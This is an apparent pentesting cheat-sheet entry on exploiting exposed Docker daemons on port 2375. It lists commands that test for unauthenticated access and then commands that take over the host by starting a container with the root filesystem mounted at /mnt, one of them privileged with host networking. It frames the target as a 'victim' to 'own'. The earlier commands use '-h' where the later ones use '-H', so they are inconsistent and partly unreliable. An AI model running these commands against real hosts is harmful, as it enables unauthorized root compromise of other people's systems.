2375 - Docker

Run docker commands against a docker host to verify if it accepts unauthenticated communication or not.

docker -h 10.10.10.10:2375 container ls
docker -h 10.10.10.10:2375 images ls

If it allows unauthenticated communication you can most likely own the host device by creating a new container and mounting the root filesystem.

docker -H 10.10.10.10:2375 run --rm -it -v /:/mnt victim.azurecr.io/httpd:alpine sh
docker -H 10.10.10.10:2375 run --rm -it --privileged --net=host -v /:/mnt alpine sh

Last updated 8 months ago